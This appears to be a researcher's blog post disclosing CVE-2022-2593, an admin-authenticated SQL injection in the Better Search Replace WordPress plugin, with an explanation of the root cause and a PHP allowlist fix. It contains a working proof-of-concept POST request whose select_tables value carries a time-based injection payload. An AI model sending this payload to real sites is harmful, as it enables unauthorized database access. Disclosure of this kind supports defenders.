YouGina

CVE-2022-2593 - SQL Injection Vulnerability in Better Search Replace WordPress Plugin

Published: 2023-06-14

I have recently been conducting code audits of various popular WordPress plugins. During one of these assessments last year, I discovered a vulnerability in the Better Search Replace WordPress plugin. The vulnerability, assigned CVE-2022-2593, exposes the plugin to a SQL injection attack, which could be exploited by high privilege users to execute arbitrary SQL statements. This article provides detailed information about the vulnerability and its impact, along with recommended actions to mitigate the risk.

The Better Search Replace WordPress plugin before version 1.4.1 is vulnerable to a SQL injection attack, which could be exploited by high privilege users to execute arbitrary SQL statements. The plugin fails to properly sanitize and escape table data before incorporating it into SQL queries, leading to the potential manipulation of database queries.

The vulnerability can be triggered by sending a crafted POST request to the better-search-replace endpoint. In the plugin's code, the select_tables parameter is not sufficiently sanitized, allowing an attacker to inject malicious SQL code into the query.

Proof of Concept

An attacker can exploit this vulnerability by sending a POST request to the following endpoint:

POST /wp-admin/tools.php?page=better-search-replace&bsr-ajax=process_search_replace HTTP/1.1
Host: [target_host]
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 369
Connection: close
Cookie:[admin+]

bsr_ajax_nonce=3c38e50368&action=process_search_replace&bsr_step=0&bsr_page=0&bsr_data=search_for%3Daaa%26replace_with%3Dcef%26select_tables%255B%255D%3Dwp_posts%60%20WHERE%201=SLEEP(1)%20--%20%26dry_run%3Don%26bsr_nonce%3Da66e81c52b%26_wp_http_referer%3D%252Fwordpress%252Fwp-admin%252Ftools.php%253Fpage%253Dbetter-search-replace%26action%3Dbsr_process_search_replace

In the request above, a POST request is sent to the /wp-admin/tools.php?page=better-search-replace&bsr-ajax=process_search_replace endpoint. The body of the request consists of the following parameters:

  • bsr_ajax_nonce: Nonce value for authentication.
  • action: Specifies the action to be performed, which is process_search_replace.
  • bsr_step and bsr_page: Parameters related to the search and replace process; both can be set to an arbitrary numeric value for the exploit to work. In this case they are set to 0.
  • bsr_data: The bsr_data contains a URL encoded string containing parameters specific for the plugin:
    • select_tables: This is the parameter that actually carries the SQL payload. In this case, the payload attempts a SQL injection by appending a malicious WHERE clause: wp_posts` WHERE 1=SLEEP(1) -- . The leading backtick closes the quoted table identifier early, and the double hyphen "--" comments out the remaining part of the original SQL query.
    • dry_run: Specifies whether the search and replace operation should be performed or only simulated; the injection works in either case.
    • bsr_nonce: Nonce value for request verification.
    • _wp_http_referer: Refers to the URL of the previous page.
    • action: Specifies the action again, which is bsr_process_search_replace.

The vulnerability arises from a flaw in the way the Better Search Replace plugin handles table names during SQL query construction. Although the plugin uses the esc_sql function provided by WordPress to sanitize most inputs, that function escapes quotes for use inside string literals and does not escape backticks, which are the delimiters of table identifiers. Because the plugin relies on it when constructing SQL queries for table names, an attacker can bypass the sanitization mechanism and inject malicious SQL code through a table name containing a backtick.

Impact:

To exploit this SQL injection vulnerability the attacker is required to have access to an account with high privilege levels, such as an administrator account. Successful exploitation could allow the attacker to execute arbitrary SQL queries within the context of the WordPress database. This could lead to unauthorized access, data manipulation, or even a complete compromise of the server running the database.

Solution:

To address this vulnerability the maintainers of the plugin revised the code to ensure proper validation of table names before using them in SQL queries. They implemented a mechanism to check the validity of table names against the existing tables in the database, thereby preventing SQL injection attacks.
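To illustrate the root cause described above and the allowlist fix the maintainers adopted, here is an added example written for this article, not code taken from the plugin. It uses a constructed stand-in for esc_sql() to show that quote escaping leaves backticks untouched, and an assumed helper validate_table() that accepts only names exactly matching the database's table list (in WordPress that list would come from $wpdb->get_col( 'SHOW TABLES' )).

```php
<?php
// Added example, not the plugin's code. Runs stand-alone without WordPress.

// Constructed stand-in for WordPress esc_sql(): escapes quotes and
// backslashes the way string-literal escaping does, but, like the real
// function, leaves backticks untouched.
function demo_esc_sql( string $value ): string {
    return addslashes( $value );
}

// Vulnerable pattern: the escaped value lands in an identifier position,
// where backticks (not quotes) delimit the name, so escaping does nothing
// to stop a backtick in the value from closing the identifier early.
function build_query_unsafe( string $table ): string {
    return 'SELECT * FROM `' . demo_esc_sql( $table ) . '` LIMIT 1';
}

// Hardened pattern (assumed helper name): accept a requested name only if
// it exactly matches one of the tables that actually exist. The identifier
// placed in the query is then never attacker-controlled text.
function validate_table( string $requested, array $existing ): ?string {
    return in_array( $requested, $existing, true ) ? $requested : null;
}

function build_query_safe( string $table, array $existing ): ?string {
    $name = validate_table( $table, $existing );
    if ( $name === null ) {
        return null; // reject the request instead of running a query
    }
    return 'SELECT * FROM `' . $name . '` LIMIT 1';
}

// Constructed table list (stands in for the SHOW TABLES result) and the
// select_tables[] value from the proof of concept above, URL-decoded.
$existing = [ 'wp_posts', 'wp_users', 'wp_options' ];
$payload  = 'wp_posts` WHERE 1=SLEEP(1) -- ';

// The unsafe builder emits a query whose WHERE clause is attacker supplied.
echo build_query_unsafe( $payload ), PHP_EOL;

// The safe builder rejects the payload and accepts only a genuine table.
var_dump( build_query_safe( $payload, $existing ) );
var_dump( build_query_safe( 'wp_posts', $existing ) );
```

The same check generalises to any identifier (column names, database names) taken from user input: escape functions protect string literals, and an allowlist of known-good names protects identifiers.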

Affected Versions:

The SQL injection vulnerability exists in the Better Search Replace WordPress plugin versions prior to 1.4.1. It is advised that all users of this plugin upgrade to the latest version immediately to mitigate the risk associated with this vulnerability.
